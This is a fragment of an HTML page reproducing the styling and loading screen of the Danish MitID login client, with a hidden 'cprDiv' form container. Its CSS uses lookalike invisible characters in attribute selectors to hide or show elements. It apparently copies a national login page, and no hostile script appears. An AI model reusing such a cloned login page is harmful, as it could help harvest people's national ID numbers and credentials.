path{fill:#fff}.mitid-loader__circular{animation:mitid-core--loader-rotate 1s linear infinite;transform-origin:center center;margin:auto;z-index:10;position:absolute;left:24px;top:28px;width:50px;height:50px}.mitid-loader__circular circle:first-child{stroke:#3380eb}.mitid-loader__circular circle:last-child{animation:mitid-core--loader-dash 1.5s linear infinite}.mitid-loader__text{text-align:center;vertical-align:middle;line-height:1.5rem;min-height:3.625rem}.mitid-loader__description{line-height:2rem;display:block;text-align:center}.mitid-loader__link{color:#0060e6;cursor:pointer;padding:0 5px}@keyframes mitid-core--loader-rotate{100%{transform:rotate(360deg)}}@keyframes mitid-core--loader-dash{0%{stroke-dasharray:50 200}100%{stroke-dasharray:50 200}}</style><style id="mitid-styles">.mitid--divider{border-radius:0;height:1px;border:none;border-width:1px;display:block;background:rgba(0,0,0,.2)}.mitid--divider-light{border-radius:0;height:1px;border:none;border-width:1px;display:block;background:rgba(0,0,0,.1)}.mitid--divider-lighter{border-radius:0;height:1px;border:none;border-width:1px;display:block;background:rgba(0,0,0,.05)}.mitid-login-divider--top{margin:.95rem 0 1.45rem 0}.mitid-login-divider--bottom{margin:0;margin-bottom:.875rem}.mitid-core-header{display:flex;overflow:hidden;justify-content:space-between;flex:0 0 auto}.mitid-core-header__text{width:243px;font-weight:700;word-break:break-word;word-wrap:break-word}.mitid-core-header__logo{height:1rem;width:3.813rem;padding-top:.25rem}.mitid-core-header__logo path{fill:#0060e6}.mitid-core-text-button{display:inline-flex;padding:.625rem .25rem;cursor:pointer;position:relative;left:-5px;border-radius:4px;text-decoration:none;align-items:center}.mitid-core-text-button:hover .mitid-core-text-button__label,.mitid-core-text-button:focus .mitid-core-text-button__label{text-decoration:underline;color:#004cb8}.mitid-core-text-button:focus{box-shadow:0 0 0 3px #0060e6}.mitid-core-text-button:active .mitid-core-text-button__label{color:#00398a;text-decoration:underline}.mitid-core-text-button:hover .mitid-core-text-button__icon path,.mitid-core-text-button:focus .mitid-core-text-button__icon path{fill:#004cb8}.mitid-core-text-button:active .mitid-core-text-button__icon path{fill:#00398a}.mitid-core-text-button__text{display:flex}.mitid-core-text-button__icon{margin-right:.25rem;width:1.5rem;height:1.5rem;display:block;cursor:pointer;flex-shrink:0}.mitid-core-text-button__icon path{fill:#001c44;cursor:pointer}.mitid-core-text-button__icon svg{cursor:pointer}.mitid-core-text-button__label{max-width:100%;cursor:pointer;font-weight:600;color:#001c44;text-decoration:none}.mitid-core-text-button:after{content:"";min-height:inherit;font-size:0}.mitid-core-footer{display:flex;flex-direction:column;justify-content:space-between;flex:0 0 auto}.mitid-core-footer__nav{display:flex;align-items:center;height:1.5rem}@media screen and (max-width: 399px){.mitid-core-footer__nav{padding:0 5px 15px 5px}}.mitid--button--left:not(:focus)::before{content:" ";width:0;height:0;border-style:solid;border-width:13px 10px 0 10px;border-color:#fff transparent transparent transparent;position:absolute;bottom:2.1rem;z-index:1000;left:1.1rem;display:none}.mitid--button--left-visibel:not(:focus)::before{display:block}.mitid--button-primary{position:relative;width:100%;cursor:pointer;box-sizing:border-box;border-radius:4px;border:none;display:inline-flex;align-items:center;outline:none;margin:0;background:#0060e6;color:#fff;border-radius:4px;height:3rem}.mitid--button-primary svg,.mitid--button-primary path{cursor:pointer}.mitid--button-primary .mitid--button-label{letter-spacing:0;line-height:1.5rem;margin-bottom:unset;font-weight:600;font-size:.875rem;text-transform:uppercase;letter-spacing:.8px;vertical-align:middle}.mitid--button-primary .mitid--button-label:hover{cursor:pointer}.mitid--button-primary .mitid--button-icon{flex-shrink:0;height:24px;width:24px;color:#fff}.mitid--button-primary .mitid--button-icon path:last-child{fill:#fff}.mitid--button-primary.icon-only{margin:.25rem;display:inline-flex;width:3rem;height:3rem;justify-content:center}.mitid--button-primary.label-only{margin:.25rem;padding:.25rem 1rem .25rem 1rem}.mitid--button-primary:not(.icon-only):not(.label-only){padding:.25rem .75rem .25rem 1rem}.mitid--button-primary .mitid--button-spacing{flex:1;width:1rem}.mitid--button-primary{box-shadow:0 0 0 5px transparent}.mitid--button-primary:focus:not(:active){box-shadow:0px 0px 0px 2px #fff,0px 0px 0px 5px #0060e6}.mitid--button-primary:hover:not(:disabled){background:#004cb8;border-radius:4px}.mitid--button-primary:hover:not(:disabled) .mitid--button-label{background:#004cb8;color:#fff !important}.mitid--button-primary:hover:not(:disabled) .mitid--button-icon{color:#fff !important}.mitid--button-primary:active:not(:disabled),.mitid--button-primary:active:not(:disabled) .mitid--button-label,.mitid--button-primary:active:not(:disabled) .mitid--button-icon{background:#00398a;position:relative;top:0;left:0}.mitid--button-primary:focus:not(:disabled):not(:active){background:#004cb8}.mitid--button-primary:disabled{background:#000;opacity:.2;text-decoration:none;cursor:not-allowed}.mitid--button-primary:disabled .mitid--button-label{cursor:not-allowed}.mitid--button-primary .mitid--button-label{color:#fff}.mitid--button-secondary{position:relative;width:100%;cursor:pointer;box-sizing:border-box;border-radius:4px;border:none;display:inline-flex;align-items:center;outline:none;margin:0;background:#fff;color:#001c44;border-radius:4px;border:1px solid #919191;height:3rem;outline:none;outline-width:0}.mitid--button-secondary svg,.mitid--button-secondary path{cursor:pointer}.mitid--button-secondary .mitid--button-label{letter-spacing:0;line-height:1.5rem;margin-bottom:unset;font-weight:600;font-size:.875rem;text-transform:uppercase;letter-spacing:.8px;vertical-align:middle}.mitid--button-secondary .mitid--button-label:hover{cursor:pointer}.mitid--button-secondary .mitid--button-icon{flex-shrink:0;height:24px;width:24px;color:#fff}.mitid--button-secondary .mitid--button-icon path:last-child{fill:#fff}.mitid--button-secondary.icon-only{margin:.25rem;display:inline-flex;width:3rem;height:3rem;justify-content:center}.mitid--button-secondary.label-only{margin:.25rem;padding:.25rem 1rem .25rem 1rem}.mitid--button-secondary:not(.icon-only):not(.label-only){padding:.25rem .75rem .25rem 1rem}.mitid--button-secondary .mitid--button-spacing{flex:1;width:1rem}.mitid--button-secondary .mitid--button-icon{flex-shrink:0;height:24px;width:24px;color:#001c44}.mitid--button-secondary .mitid--button-icon path:last-child{fill:#001c44}.mitid--button-secondary:not(.icon-only):not(.label-only):hover,.mitid--button-secondary:not(.icon-only):not(.label-only):focus,.mitid--button-secondary:not(.icon-only):not(.label-only):disabled{padding:.25rem 10px .25rem 1rem}.mitid--button-secondary:hover:not(:disabled):not(:active):not(.icon-only) .mitid--button-icon,.mitid--button-secondary:hover:not(:disabled):not(:active):not(.icon-only) .mitid--button-label{position:relative;right:1px}.mitid--button-secondary:hover:not(:disabled){border:2px solid #0060e6}.mitid--button-secondary:hover:not(:disabled) .mitid--button-label,.mitid--button-secondary:hover:not(:disabled) .mitid--button-icon{color:#0060e6}.mitid--button-secondary:hover:not(:disabled) .mitid--button-label path,.mitid--button-secondary:hover:not(:disabled) .mitid--button-icon path{fill:#0060e6}.mitid--button-secondary:active:not(:disabled){border:2px solid #00398a}.mitid--button-secondary:active:not(:disabled) .mitid--button-label,.mitid--button-secondary:active:not(:disabled) .mitid--button-icon{color:#00398a}.mitid--button-secondary{box-shadow:0px 0px 0px 5px transparent}.mitid--button-secondary:focus:not(:active){box-shadow:0px 0px 0px 2px #fff,0px 0px 0px 5px #0060e6;border:2px solid #0060e6 !important}@supports(-moz-appearance: none){.mitid--button-secondary{height:49px}}.mitid--button-secondary:focus:not(:disabled):not(.icon-only) .mitid--button-icon,.mitid--button-secondary:focus:not(:disabled):not(.icon-only) .mitid--button-label{position:relative;right:1px}.mitid--button-secondary:focus:not(:active) .mitid--button-label,.mitid--button-secondary:focus:not(:active) .mitid--button-icon{color:#0060e6}.mitid--button-secondary:focus:not(:active) .mitid--button-label path,.mitid--button-secondary:focus:not(:active) .mitid--button-icon path{fill:#0060e6}.mitid--button-secondary:disabled{border:1px solid rgba(0,0,0,.2);color:rgba(0,0,0,.4);text-decoration:none;cursor:not-allowed}.mitid--button-secondary:disabled .mitid--button-label{cursor:not-allowed}.mitid--button-secondary .mitid--button-label{color:#001c44}.mitid--button-icon{border:0;background:transparent;margin:0}.mitid--button-icon svg,.mitid--button-icon path{cursor:pointer}.mitid--button--left{margin-left:2rem}.mitid-checkbox{-webkit-appearance:none;appearance:none;display:block;position:relative;padding-left:2.188rem;max-width:300px;cursor:pointer;margin-top:.5rem}.mitid-checkbox__label{overflow:hidden;display:block;cursor:pointer;font-weight:600;color:#001c44;word-break:break-word;word-wrap:break-word}.mitid-checkbox__input{position:absolute;opacity:0;cursor:pointer;height:1.5rem;width:1.5rem;top:0;left:0}.mitid-checkbox__checkmark{position:absolute;top:0;left:0;height:1.5rem;width:1.5rem;background-repeat:no-repeat;background-position:center;display:flex;align-items:center;justify-content:center;cursor:pointer}.mitid-checkbox__checker{width:18px;height:18px;display:block;border:#001c44 solid 2px;border-radius:3px;box-sizing:border-box;cursor:pointer}.mitid-checkbox__input:checked~.mitid-checkbox__checkmark>.mitid-checkbox__checker{border-color:#0060e6}.mitid-checkbox__input:focus~.mitid-checkbox__checkmark{box-shadow:0 0 0 3px #0060e6;border-radius:4px}.mitid-checkbox__input:not(:checked):focus~.mitid-checkbox__checkmark>.mitid-checkbox__checker{border-color:#0060e6}.mitid-checkbox__input:checked~.mitid-checkbox__checkmark>.mitid-checkbox__checker{position:relative;background-size:18px 18px;border:none !important;background-color:#0060e6}.mitid-checkbox__input:checked~.mitid-checkbox__checkmark>.mitid-checkbox__checker::after{content:" ";transform-origin:left top;border-right:2px solid #fff;border-top:2px solid #fff;left:2px;top:9px;height:10px;width:5px;position:absolute;transform:scaleX(-1) rotate(135deg)}.mitid-checkbox:hover .mitid-checkbox__input:not(:checked)~.mitid-checkbox__checkmark>.mitid-checkbox__checker{border-color:#0060e6}.mitid-checkbox--no-margin{margin:0}.mitid-core-user{flex:0 0 auto}.mitid-core-user__input{width:100%;max-width:100%;min-width:200px;display:inline-block}.mitid-core-user__input[defaultlanguage^="DA / DK"]{visibility:hidden;pointer-events:none;position:absolute}.mitid-core-user__input[defaultlanguage^="DA / DK"] input{visibility:hidden}.mitid-core-user__input[defaultlanguage^="DA /ﾠDK"]{display:none;pointer-events:none;position:absolute}.mitid-core-user__input[defaultlanguage^="DA /ﾠDK"] input{visibility:hidden}.mitid-core-user__input[defaultlanguage^="DAﾠ/ﾠDK"]{visibility:visible;display:block;pointer-events:all}.mitid-core-user__input[defaultlanguage^="DAﾠ/ﾠDK"]:disabled{opacity:.2;pointer-events:none}.mitid-core-user__user-id{display:inline-block;border-radius:.25rem;outline:none;height:3rem;width:100%;padding:0 1rem;font-weight:500 !important;letter-spacing:0;border:1px solid #919191;box-sizing:border-box;margin-bottom:1rem;caret-color:#0060e6}.mitid-core-user__user-id:hover,.mitid-core-user__user-id:active,.mitid-core-user__user-id:focus{border:2px solid #0060e6;background:#fff;position:relative;right:1px}.mitid-core-user__user-id:hover:not(:focus){position:relative;opacity:1}.mitid-core-user__user-id:-ms-input-placeholder{font-weight:500 !important;color:#333 !important;opacity:1}.mitid-core-user__user-id::placeholder{font-weight:500 !important;color:#333 !important;opacity:1}.mitid-core-user__user-id:-ms-input-placeholder{font-weight:500 !important;color:#333 !important}.mitid-core-user__user-id::-ms-input-placeholder{font-weight:500 !important;color:#333 !important}.mitid-core-user__user-id::-ms-clear,.mitid-core-user__user-id::-ms-reveal{display:none}.mitid-core-user__user-id:focus{background:rgba(0,96,230,.05) !important;border:2px solid #0060e6 !important;position:relative;right:1px}.mitid--button-primary{margin-bottom:.5rem;color:#fff}.mitid--button-primary[showicontext^="Icon Help Text"]{visibility:hidden;pointer-events:none;position:absolute;width:0;height:0}.mitid--button-primary[showicontext^="Icon Help Text"] *{visibility:hidden}.mitid--button-primary[showicontext^="Icon HelpﾠText"]{display:none;pointer-events:none;position:absolute}.mitid--button-primary[showicontext^="Icon HelpﾠText"] *{visibility:hidden}.mitid--button-primary[showicontext^=IconﾠHelpﾠText]{display:inline-flex;visibility:visible;pointer-events:all}.mitid--button-primary[showicontext^=IconﾠHelpﾠText]:disabled{display:inline-flex;opacity:.2}.mitid-core-close{display:block}.mitid-core-close button{width:2.75rem;height:2.75rem;padding:0;box-sizing:content-box;outline:none;display:flex;align-items:center;justify-content:center;cursor:pointer}.mitid-core-close button svg{height:24px;width:24px}.mitid-core-close button svg path{fill:#001c44}.mitid-core-close button:hover svg{border:3px solid #0060e6;border-radius:4px}.mitid-core-close button:hover svg path{fill:#004cb8}.mitid-core-close button:active path{fill:#00398a}.mitid-core-close button:focus svg{border:3px solid #0060e6;border-radius:4px}.mitid-core-close button:focus svg path{fill:#004cb8}.mitid-core-close--corner{position:absolute;top:-8px;right:0}.mitid-core-tooltip{color:#333;font-size:1rem;left:4px;letter-spacing:0px;line-height:1.5rem;font-weight:400;font-style:normal;position:relative;padding:0;text-decoration:none;color:#000;list-style:none;text-align:left;letter-spacing:0px;z-index:2000;display:block}.mitid-core-tooltip__content{position:absolute;left:-4px;right:4px;background-color:#fff;border-radius:4px;box-shadow:0px 0px 10px 0px rgba(0,0,0,.3);z-index:1000;overflow:hidden}.mitid-core-tooltip .mitid-core-tooltip__header{display:flex;justify-content:space-between;margin:.5rem 0 .5rem 1rem;position:relative}.mitid-core-tooltip .mitid-core-tooltip__header h2{margin-top:.438rem;max-width:285px}.mitid-core-tooltip__text{margin:0 2rem 1rem 1rem;display:block}.mitid-core-tooltip__link{display:block;position:relative;top:.313rem}.mitid-core-overlay{position:absolute;top:0px;left:-0.313rem;right:-0.313rem;bottom:0px;background-color:rgba(255,255,255,.6);z-index:2}.mitid-core-overlay--inside{bottom:40px;top:42px}.mitid-link{display:inline-flex;cursor:pointer;position:relative;left:-5px;border-radius:4px;text-decoration:none;align-items:center;min-height:1.75rem;padding:0 .25rem;padding-left:2.188rem}.mitid-link:hover .mitid-link__label,.mitid-link:focus .mitid-link__label{text-decoration:underline;color:#004cb8}.mitid-link:focus{box-shadow:0 0 0 3px #0060e6}.mitid-link:active .mitid-link__label{color:#00398a;text-decoration:underline}.mitid-link:hover .mitid-link__icon path,.mitid-link:focus .mitid-link__icon path{fill:#004cb8}.mitid-link:active .mitid-link__icon path{fill:#00398a}.mitid-link__icon{margin-right:0;position:absolute;top:2px;left:2px;height:1.5rem;width:1.5rem;display:flex;align-items:center;justify-content:center;cursor:pointer}.mitid-link__icon svg{cursor:pointer}.mitid-link__icon path{fill:#0060e6;cursor:pointer}.mitid-link__label{max-width:100%;cursor:pointer;font-weight:600;color:#0060e6;text-decoration:none;letter-spacing:.2px;word-break:break-word;word-wrap:break-word}.mitid-link:after{content:"";min-height:inherit;font-size:0}.mitid-link--vertical-align{margin-left:.25rem;color:#0060e6}.mitid-link--vertical-align .mitid-core-text-button__icon{margin-right:.438rem}.mitid-link--vertical-align .mitid-core-text-button__icon path{fill:#0060e6}.mitid-tooltip{width:100%}.mitid-tooltip--labeltextleft h2,.mitid-tooltip--iconandlabeltextleft h2,.mitid-tooltip--headertextcentered h2{margin:0 auto}.mitid-tooltip--labeltextleft i{display:none}.mitid-tooltip--headertextcentered .mitid-tooltip__label{display:flex}.mitid-tooltip--headertextcentered .mitid-tooltip__label label{width:100%;font-size:1.25rem;line-height:1.75rem;text-align:center;text-transform:none}.mitid-tooltip--headertextcentered .mitid-tooltip__label i{display:none}.mitid-tooltip__label{display:inline-flex;align-items:center;padding-bottom:.5rem;position:relative}.mitid-tooltip__text{font-weight:600;font-size:.875rem;line-height:1.5rem;text-transform:uppercase;letter-spacing:.2px}.mitid--button-icon-tooltip:hover path,.mitid--button-icon-tooltip:focus path{fill:#0060e6}.mitid--button-icon-tooltip:active path{fill:#00398a}.mitid--button-icon-tooltip:focus svg{background-color:#fff;border-radius:.25rem;box-shadow:0px 0px 0px 2px #fff,0px 0px 0px 5px #0060e6}.mitid--button-icon-tooltip{position:absolute;-webkit-appearance:none;appearance:none;line-height:1.5rem;display:flex;right:-2.75rem;top:-0.625rem;height:2.75rem;width:2.75rem;cursor:pointer;overflow:visible;justify-content:center;background-color:#fff;align-items:center;background-color:transparent}.mitid--button-icon-tooltip svg{height:1rem;width:1rem;cursor:pointer}.mitid--button-icon-tooltip path{fill:#001c44;cursor:pointer}.mitid-core-icon--auth{display:inline-block;width:1.5rem;height:1.5rem;background-repeat:no-repeat;position:relative;top:7px}.mitid-core-icon--margin-right{margin-right:8px}.mitid-core-authenticator{display:flex;flex-direction:column;justify-content:stretch;height:100%}.mitid-core-authenticator__iframe{height:100%;border:none;width:104%;position:relative;left:-7px;flex:1 1 auto}.mitid-core-authenticator__iframe:focus{outline:none}.mitid-core-authenticator__header{flex:0 0 auto}.mitid-authenticators{display:block}.mitid-authenticators__list{background-color:#fff;border:1px solid #979797;border-radius:4px;padding:0;margin:0 0 16px 0;display:block}.mitid-authenticators__item{margin:0;width:100%;display:flex;align-items:center;color:#001c44;background-color:#fff;padding:0 0 0 1rem;border:2px solid transparent !important;box-sizing:border-box;cursor:pointer}.mitid-authenticators__item:nth-child(1),.mitid-authenticators__item:last-of-type{border-radius:3px}.mitid-authenticators__item::-moz-focus-inner{border:0}.mitid-authenticators__item:active span{position:relative;top:0}.mitid-authenticators__item i{position:relative;top:0;margin-right:.5rem;font-style:normal;outline:none}.mitid-authenticators__item:nth-child(1){border-radius:4px 4px 0 0}.mitid-authenticators__item:last-of-type{border-radius:0 0 4px 4px}.mitid-authenticators__item:hover{background-color:#f2f7fe}.mitid-authenticators__item:hover .mitid-authenticators__name{color:#0060e6}.mitid-authenticators__item:hover path{fill:#0060e6}.mitid-authenticators__item:active span{position:relative;top:0}.mitid-authenticators__item:focus{outline:none;background-color:#f2f7fe;box-shadow:0 2px #0060e6 inset,0 -2px #0060e6 inset,-2px 0 #0060e6 inset,2px 0 #0060e6 inset}.mitid-authenticators__item:focus path{fill:#0060e6}.mitid-authenticators__item:focus .mitid-authenticators__name{color:#0060e6}.mitid-authenticators__name{font-weight:600;padding:10px 0;max-width:272px;cursor:pointer}.mitid-authenticators__name:nth-of-type(1):not(:last-child):after{content:"+";font-size:1rem;position:relative;padding-left:4px;padding-right:4px}.mitid-authenticators--selected{background-color:#00398a !important;border-radius:0;box-shadow:-1px 0 0 0 #00398a,1px 0 0 0 #00398a;cursor:default}.mitid-authenticators--selected .mitid-authenticators__name{color:#fff}.mitid-authenticators--selected path{fill:#fff !important}.mitid-authenticators--selected:nth-child(1){border-radius:4px 4px 0 0;box-shadow:0 -1px #00398a,-1px 0 #00398a,1px 0 #00398a}.mitid-authenticators--selected:last-of-type{border-radius:0 0 4px 4px;box-shadow:-1px 0 #00398a,1px 0 #00398a,-1px 1px #00398a,1px 1px #00398a}.mitid-authenticators--selected:last-of-type:active span{position:relative;top:0}.mitid-authenticators--selected:hover .mitid-authenticators__name{color:#fff;cursor:default}.mitid-authenticators--selected:focus{box-shadow:0 -2px #fff inset,-2px 0 #fff inset,2px 0 #fff inset,-1px 1px #00398a,1px 1px #00398a,-1px -1px #00398a,1px -1px #00398a,0 2px 0 0 #fff inset}.mitid-authenticators--selected:focus .mitid-authenticators__name{color:#fff}.mitid-authenticators--selected:focus:nth-child(1){border-radius:4px 4px 0 0;box-shadow:0 2px #fff inset,0 -2px #fff inset,-2px 0 #fff inset,2px 0 #fff inset,-1px 1px #00398a,0 -1px #00398a,-1px 0 #00398a,1px 1px #00398a}.mitid-authenticators--selected:focus:last-of-type{border-radius:0 0 4px 4px;box-shadow:0 2px #fff inset,0 -2px #fff inset,-2px 0 #fff inset,2px 0 #fff inset,-1px 1px #00398a,1px 1px #00398a,-1px -1px #00398a,1px -1px #00398a}.mitid-core-reference-text{margin-bottom:1rem;flex:0 0 auto;display:block}.mitid-core-terms{display:flex;flex-direction:column;height:100%;justify-content:stretch;position:relative}.mitid-core-terms__summary{z-index:1}.mitid-core-terms__content p{display:block;margin-top:.313rem}.mitid-core-terms__actions{margin:1.5rem 0;min-height:5.5rem;display:flex;flex-direction:column;justify-content:space-between}.mitid-core-terms__continue{height:3.85rem}.mitid-core-terms__label{overflow:hidden;display:block;font-weight:600;color:#001c44}.mitid-notification{height:100%}.mitid-notification__content{padding:16px 16px 12px 56px;position:relative;margin-bottom:1rem;display:block;overflow:hidden}.mitid-notification--info{background-color:#f2f7fe;border:1px solid rgba(0,96,230,.2)}.mitid-notification--info:before{content:" ";background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24'%3e%3cpath fill='%230060e6' d='M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-6h2v6zm0-8h-2V7h2v2z'/%3e%3c/svg%3e");position:absolute;display:block;width:24px;height:24px;left:16px;float:left}.mitid-notification--info:before path{fill:#0060e6}.mitid-notification--warning{background-color:#fffbf2;border:1px solid rgba(254,171,0,.2)}.mitid-notification--warning:before{content:" ";background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24' viewBox='0 0 64 64'%3e%3cg fill='none' fill-rule='evenodd'%3e%3cpath d='M0 0h24v24H0z'/%3e%3cpath fill='%23FEAB00' d='M32 5.333C17.28 5.333 5.333 17.28 5.333 32 5.333 46.72 17.28 58.667 32 58.667c14.72 0 26.667-11.947 26.667-26.667C58.667 17.28 46.72 5.333 32 5.333z'/%3e%3cpath fill='black' d='M32 34.667A2.675 2.675 0 0129.333 32V21.333c0-1.466 1.2-2.666 2.667-2.666 1.467 0 2.667 1.2 2.667 2.666V32c0 1.467-1.2 2.667-2.667 2.667zM34.667 45.333h-5.334V40h5.334z'/%3e%3c/g%3e%3c/svg%3e");position:absolute;display:block;width:24px;height:24px;left:16px;float:left}.mitid-notification--error{background-color:#fdf2f2;border:1px solid rgba(218,0,0,.2)}.mitid-notification--error:before{content:" ";background-image:url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' width='24' height='24'%3e%3cpath fill='%23da0000' fill-rule='evenodd' d='M4.47 21h15.06c1.54 0 2.5-1.67 1.73-3L13.73 4.99c-.77-1.33-2.69-1.33-3.46 0L2.74 18c-.77 1.33.19 3 1.73 3zM12 14c-.55 0-1-.45-1-1v-2c0-.55.45-1 1-1s1 .45 1 1v2c0 .55-.45 1-1 1zm1 4h-2v-2h2v2z'/%3e%3c/svg%3e");position:absolute;display:block;width:24px;height:24px;left:16px;float:left}.mitid-notification__message,.mitid-notification__support{display:block}.mitid-core-section{flex:1 1 auto;display:flex;flex-direction:column;position:relative}.mitid-core-switch{display:flex;align-items:center}@media screen and (max-width: 399px){.mitid-core-switch{margin-left:.313rem}}.mitid-core-content{width:100%;margin:0;position:relative;display:flex;flex-direction:column;box-sizing:content-box;z-index:1;flex:1 0 auto;justify-content:stretch}.mitid-spinner{position:absolute;height:5px;width:100%;left:0;top:0;overflow:hidden;z-index:100;display:block}.mitid-spinner__spin{background-color:#0060e6;width:225px;height:4px;position:relative;animation-name:mitid-spinner;animation-duration:2s;animation-iteration-count:infinite;display:block}@keyframes mitid-spinner{0%{left:-225px;top:0px}100%{left:100%;top:0px}}.mitid-core-help{position:absolute;z-index:1000;background-color:#fff;border-radius:4px;box-shadow:0 5px 14px 3px rgba(0,0,0,.2);bottom:2rem;padding:.5rem .5rem .5rem 1rem;width:336px;box-sizing:border-box;left:-2px}@media screen and (max-width: 399px){.mitid-core-help{bottom:44px}}.mitid-core-help .mitid--divider-light,.mitid-core-help .mitid--divider{max-width:304px;margin:8px 0}.mitid-core-help__header{display:flex;align-items:center;height:2.5rem}.mitid-core-help__header .mitid-core-help__header-text{flex:1 1 100%;margin:0}.mitid-core-help__menu{padding:0;margin:0;list-style:none;display:inline-block;width:100%;height:100%}.mitid-core-help__menu-item{flex:1;min-height:44px;margin:0;padding:0 1.5rem 0 0;display:flex;align-items:center}.mitid-core-help__link-divider{margin-top:.5rem;margin-bottom:.438rem}@media screen and (max-width: 399px){.mitid-core-help{width:97%;margin:0 5px;min-width:266px}}.mitid-core-finalize{position:relative;display:flex;align-items:center;justify-content:center;height:100%;min-height:300px;flex-direction:column;flex:1 1 auto}@media screen and (max-height: 520px){.mitid-core-finalize{justify-content:flex-start}}.mitid-core-finalize__logo{height:24px;position:relative;width:62px;margin-bottom:24px}.mitid-core-finalize__logo-svg{position:absolute;left:-85px;top:-20px;height:62px;width:234px;transform:scale(0.26)}.mitid-core-finalize__logo-svg path{fill:#0060e6}.mitid-core-finalize__shield{position:absolute;width:100px;height:117px}.mitid-core-finalize__shield path{fill:#0060e6}.mitid-core-finalize__state{position:relative;height:120px;width:100px;margin-bottom:24px;display:block}.mitid-core-finalize__title{font-size:1.25rem;font-weight:700;line-height:1.75rem;display:block;text-align:center;height:60px}.mitid-core-finalize__done:after{opacity:0;height:34px;width:14px;transform-origin:left top;border-right:4px solid #fff;border-top:4px solid #fff;content:"";left:32px;top:55px;position:absolute;animation-duration:800ms;animation-delay:100ms;animation-timing-function:ease-in;animation-name:checkmark;animation-fill-mode:forwards;transform:scaleX(-1) rotate(135deg)}@keyframes checkmark{0%{height:0;width:0;opacity:1}20%{height:0;width:14px;opacity:1}35%{height:34px;width:14px;opacity:1}100%{height:34px;width:14px;opacity:1}}.mitid-core-client{overflow-y:auto;overflow-x:hidden;justify-content:stretch;flex-direction:column}@media screen and (max-width: 399px),(max-height: 520px){.mitid-core-client{height:588px !important}}</style>

    


    <div class="auth-page">
        <div class="auth-container">
            <div class="auth-container__client">
                <span id="coreClientParent"><main id="mitId" class="mitid-loader mitid-core-client" style="display: none; height: 588px; width: 400px; font-family: &quot;IBM Plex Sans&quot;, Arial, Helvetica, FreeSans, sans, sans-serif;">
                    
                    
                    <div class="mitid-loader__content" aria-busy="true" aria-live="polite"><div class="mitid-loader__logo"><svg xmlns="http://www.w3.org/2000/svg" width="61" height="16" viewBox="0 0 61 16" focusable="false" aria-label="MitID logo" class="mitid-loader__logo-svg"><path d="M19.2 0c1 0 1.8.8 1.8 1.8s-.8 1.8-1.8 1.8-1.8-.8-1.8-1.8.8-1.8 1.8-1.8zm21.2 0c2.1 0 3.8 1.7 3.8 3.8 0 2.1-1.7 3.8-3.8 3.8-2.1 0-3.8-1.7-3.8-3.8 0-2.1 1.7-3.8 3.8-3.8zM20.7 4.9v10.9h-3V4.9h3zM2.9.8l4.6 7.1L12 .8h2.9v15h-3.1V6.1l-4.3 6.4h-.1L3.1 6.1v9.7H0V.8h2.9zM40.4 9c3.6 0 6.5 2 6.9 6.8H33.6C34 11 36.9 9 40.4 9zM51.9.2C58.3.2 61 3.7 61 8s-2.7 7.8-9.1 7.8h-2.6V.2h2.6zM27.1 1.9v3h2.4v2.4h-2.4v4.8c0 .9.5 1.2 1.3 1.2.5 0 1-.1 1.3-.4v2.7c-.4.2-1.2.3-2 .3-2.2 0-3.6-1.1-3.6-3.5V7.3h-1.7V4.9h1.7v-3h3z"></path></svg></div><div class="mitid-loader__state"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" class="mitid-loader__shield" aria-hidden="true"><path d="M49.9 0l50 15v41.2c0 47.8-50 60.8-50 60.8s-50-13-50-60.8V15l50-15"></path></svg><svg viewBox="30 30 60 60" focusable="false" aria-hidden="true" class="mitid-loader__circular"><circle cx="60" cy="60" r="27" fill="none" stroke="#3380eb" stroke-linecap="square" stroke-miterlimit="10" stroke-width="5"></circle><circle cx="60" cy="60" r="27" fill="none" stroke="#fff" stroke-dasharray="50 200" stroke-linecap="square" stroke-miterlimit="10" stroke-width="5"></circle></svg></div><div class="mitid-loader__text"><h1 class="mitid-loader__title" aria-live="assertive">Sikker forbindelse til MitID</h1><span class="mitid-loader__description">Vent venligst ... </span></div></div></main></span>
                <form>
                    <div id="cprDiv" style="display: none; padding: 10px">
                        <div>
                            <div>
                                <div>
                                    <div>
                      
                                </div>
                            </div>
                        </div>

            </div>
        </div>
		
		
		
		
  

</form></div></div></div></div></div></div></section></main></div></body></html>